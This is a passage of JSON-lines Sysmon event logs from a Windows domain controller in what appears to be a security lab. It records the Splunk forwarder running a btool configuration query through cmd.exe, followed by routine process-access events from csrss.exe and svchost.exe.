{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2008,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.553\r\nProcessGuid: {41C8662E-1F77-5F25-0000-0010F5E80300}\r\nProcessId: 3808\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nParentProcessId: 3824\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.553","ProcessGuid":"{41C8662E-1F77-5F25-0000-0010F5E80300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F75-5F25-0000-00106CC50300}","ParentProcessId":"3824","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2009,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nSourceProcessId: 3824\r\nSourceThreadId: 3888\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-0010F5E80300}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-00106CC50300}","SourceProcessId":"3824","SourceThreadId":"3888","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-0010F5E80300}","TargetProcessId":"3808","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2010,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F77-5F25-0000-0010F5E80300}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F77-5F25-0000-0010F5E80300}","TargetProcessId":"3808","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2011,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2012,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2013,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2014,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2015,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:27.549","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2016,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:27.549\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 